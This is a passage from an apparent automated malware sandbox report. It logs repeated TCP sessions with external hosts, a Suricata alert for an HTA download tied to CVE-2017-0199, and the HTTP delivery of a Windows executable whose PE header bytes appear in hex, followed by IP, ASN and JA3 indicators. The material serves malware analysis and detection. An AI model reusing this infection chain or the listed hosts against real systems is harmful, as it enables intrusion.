        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49167

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.175.113.214:80 -> 192.168.2.22:49166
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 10:21:39 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 28 Oct 2024 05:07:08 GMTETag: "b4483-6258270c9fdc6"Accept-Ranges: bytesContent-Length: 738435Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad b1 28 81 e9 d0 46 d2 e9 d0 46 d2 e9 d0 46 d2 2a df 19 d2 eb d0 46 d2 e9 d0 47 d2 76 d0 46 d2 2a df 1b d2 e6 d0 46 d2 bd f3 76 d2 e3 d0 46 d2 2e d6 40 d2 e8 d0 46 d2 52 69 63 68 e9 d0 46 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 39 ed 6f 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 7c 02 00 00 04 00 00 0c 32 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 70 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 85 00 00 a0 00 00 00 00 00 04 00 b8 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 13 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 55 02 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 b8 66 00 00 00 00 04 00 00 68 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
        Source: Joe Sandbox ViewIP Address: 199.217.106.226 199.217.106.226
        Source: Joe Sandbox ViewIP Address: 199.217.106.226 199.217.106.226
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
